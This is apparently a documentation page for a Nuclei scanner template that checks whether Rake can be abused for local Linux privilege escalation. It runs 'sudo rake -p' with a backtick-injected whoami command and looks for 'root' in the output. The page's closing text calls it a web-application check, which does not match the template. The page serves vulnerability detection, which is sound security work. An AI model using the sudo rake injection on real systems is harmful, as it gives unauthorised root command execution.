Rake - Privilege Escalation
ID: privesc-rake
Severity: high
Author: daffainfo
Tags: code,linux,rake,privesc,local
Description
Section titled “Description”Rake is a build automation tool written in Ruby. It is similar to Make, Ant, or MSBuild, but uses a Ruby syntax. Rake is often used for automating tasks in software development, such as building, testing, and deploying applications.
YAML Source
Section titled “YAML Source”id: privesc-rake
info: name: Rake - Privilege Escalation author: daffainfo severity: high description: | Rake is a build automation tool written in Ruby. It is similar to Make, Ant, or MSBuild, but uses a Ruby syntax. Rake is often used for automating tasks in software development, such as building, testing, and deploying applications. reference: - https://gtfobins.github.io/gtfobins/rake/ metadata: verified: true max-request: 3 tags: code,linux,rake,privesc,local
self-contained: truecode: - engine: - sh - bash source: | whoami
- engine: - sh - bash source: | rake -p '`whoami 1>&0`'
- engine: - sh - bash source: | sudo rake -p '`whoami 1>&0`'
matchers-condition: and matchers: - type: word part: code_1_response words: - "root" negative: true
- type: dsl dsl: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or# digest: 4a0a00473045022100d487d15749e6a7529015eae54d06d944a9cea9a4aac8919be99e0d5a2d8c170602206f91a1c9ef3850b5fba9a4cc4da81def3f52b1906fd7e12327bc62c100a3ed4a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "code/privilege-escalation/linux/binary/privesc-rake.yaml"